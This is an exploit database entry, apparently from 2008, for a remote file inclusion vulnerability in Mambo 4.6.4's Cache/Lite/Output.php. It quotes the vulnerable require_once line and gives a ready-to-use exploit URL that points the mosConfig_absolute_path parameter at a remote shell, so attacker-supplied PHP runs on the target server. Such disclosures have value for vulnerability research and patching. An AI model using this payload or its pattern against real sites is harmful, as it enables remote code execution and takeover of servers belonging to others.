Lucene search
Irk4zEDB-ID:5808HistoryJun 13, 2008 - 12:00 a.m.
Mambo 4.6.4 - 'Output.php' Remote File Inclusion
2008-06-1300:00:00
irk4z
www.exploit-db.com
20
.-----------------------------------------------------------------------------.
| vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability |
| download: http://mambo-foundation.org/ |
| |
| author: [email protected] |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: all friends ;) |
'-----------------------------------------------------------------------------'
# code:
/includes/Cache/Lite/Output.php :
1 <?php
2
3 /**
4 * This class extends Cache_Lite and uses output buffering to get the data to cache.
5 *
6 * There are some examples in the 'docs/examples' file
7 * Technical choices are described in the 'docs/technical' file
8 *
9 * @package Cache_Lite
10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11 * @author Fabien MARTY <[email protected]>
12 */
13
14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...
^ no comment.. RFI in line 14..
# exploit:
http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
# milw0rm.com [2008-06-13]